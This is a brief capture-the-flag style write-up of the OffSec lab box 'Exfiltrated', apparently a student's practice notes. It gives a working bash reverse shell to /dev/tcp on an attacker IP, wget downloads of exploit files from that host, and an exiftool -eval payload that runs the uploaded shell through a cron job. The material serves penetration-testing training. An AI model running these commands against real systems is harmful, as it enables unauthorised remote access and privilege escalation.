Exfiltrated

80

Now trying a file upload vulnerability https://www.exploit-db.com/exploits/49876:

python3 subrionfileup.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.167/8000 0>&1

Our exiftool version is vulnerable to this exploit. Using the exiftool exploit Transfer the required files:

wget http://192.168.45.167/eval.config
wget http://192.168.45.167/runme.jpg

create a malicious image:

exiftool -config eval.config runme.jpg -eval='system("bash /var/www/html/subrion/uploads/shell.sh")'

in /var/www/html/subrion/uploads

Lesson Learnt

Just because a script runs in cron and uses a specific binary it might not be tricking the script and might be about the version too

Last updated